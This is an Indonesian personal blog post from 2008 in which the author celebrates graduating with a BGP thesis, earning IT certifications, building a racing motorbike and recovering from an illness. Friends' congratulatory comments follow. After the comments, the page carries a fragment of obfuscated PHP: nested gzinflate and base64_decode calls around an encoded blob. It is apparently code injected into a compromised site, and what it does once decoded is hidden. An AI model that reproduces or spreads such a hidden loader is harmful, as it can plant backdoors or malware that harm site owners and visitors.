Delicious

Archives

Categories

Lucky Bastard

  ozzie / 18/11/2008


Mungkin gw emang bajingan yang cukup beruntung :D.. dengan pola hidup yang acak-acakan 8-} dan pemikiran yang Nggak Bangettt… ;))

Terispirasi dari quote di PDA salah satu abang gw :">:">

Gagal MeRencanakan berarti MeRencanakan keGagalan

Alhamdulillah [-o< [-o< [-o< Atas berkat Rahmat Allah SWT.. cita-cita gw selama 4 bulan terakhir udah ter-Realiasai <:-p<:-p

Dari mulai Kuliah yang udah selesai\:d/\:d/.. dengan embel-embel title di belakang nama:"> ditambah Ijazah yang Sangat Memuaskan dengan tugas akhir membahas BGP :D.. dengan grade yg lumayan lah untuk kelas mahasiswa bego kayak gw :">.. dan beberapa sertifikat RDBMS, Networking dan Linux dari Informatics sebagai lembaga sertifikasi:D… dan InsyaAllah [-o<[-o< rencana kedepan akan mengikuti wisuda pada bulan desember mendatang<:-p.. dan InsyaAllah jika ada Rezeky akan meneruskan Sekolah Lagih[-o<.. biar gak gampang di Bego – in .. :)>-

Ngebangun motor kenceng ;));)).. dengan total pengeluaran yang ampir setara dengan harga motor nya:)):)).. dan InsyaAllah akan di-ikut sertakan dalam event balap resmi maupun tidak resmi (Liaran :red) 8-}.. dan InsyaAllah tahun depan mencari pengganti si Item buat harian:-s.. maklumlah.. Kerjaan Gak Jelas 8-}8-}

Telah memiliki barcode dan tergabung sebagai Anggota Inti<:-p<:-p.. dan ikutan belajar berorganisasi:">:">.. walupun untuk sekarang hanya baru bisa ikut berkontribusi dalam dunia maya8-| sebagai donatur infrastruktur website (SSFC) :D:D… Moga-moga jiwa sosial gw gak ketinggalan [-o<[-o< maklum.. secara gw Kurang Gaol ;))

Penyakit gw udah sembuh tanpa harus melewati operasi<:-p.. dengan menggunakan ramuan tradisional :D :D.. ternyata Mujarab;)

Mungkin rencana kedepan masih banyak.. memperbaiki kinerja:-s… meningkatkan knowledge:"> maen OpenSource lagi:D.. membangun infrastruktur bengkel[-o<.. belajar mikir8-}..


« »


6 Responses to “Lucky Bastard”

  1. udey Says:

    Selamat Oz…. Semoga cepat rapet momongan *loh…

  2. begenkagapakenich Says:

    Akhirnye lulus juga ya zie, congrats dah, mudah2an bisa terealisir mimpi2 yang blum tercapai :D

  3. kunyuk Says:

    finally,,, selamet yah om …
    sama nich saya juga akhirnya ada embel2 juga diblakang nama gw,,hehe… sukses ya bro ^^v

  4. ozzie Says:

    perlu bantuan nda zie?? buat eksekusi musuhnya:D

  5. boga Says:

    Gokil abiz boy

  6. Hyorinmaru Says:

    Lucunaaaa… :-D
    Semoga saya bukan termasuk kategori musuh, hihi… ^^

    Ehm, BTW, selamat yach, atas segala kesuksesan; inget kesuksesan dan ketidaksuksesan itu dipergilirkan ama Yang Maha Kuasa loh, jadi setelah ini, siap-siap lah tidak sukses… Loh?!
    Hehe… pis ah :)


".gzinflate(base64_decode(gzinflate(base64_decode(gzinflate(base64_decode('BcHRdkMwAADQD/KgS0mzR8ShjSMJNWveEEamOGljab9+9+KOSbyef5IA89DREZ+phxlyKhQ2sF/pt2hxFtPHwFYI4J1+mVr7YRsVICLl0fQMYyzzvW8FIOGbX1PVUVAP0/uWuZs8RWoEcMl8XpKEe37FrPxw/eeNGNw19npJt8S5uOlh83I2wUDpI6btM7hPv0s8Idtwt7XVp6gqMz92VSRz6Zx7WFuuSb8YAk8IveQfQ69xi7kGBRCNSsZSDPl+CP4B'))))))); ?>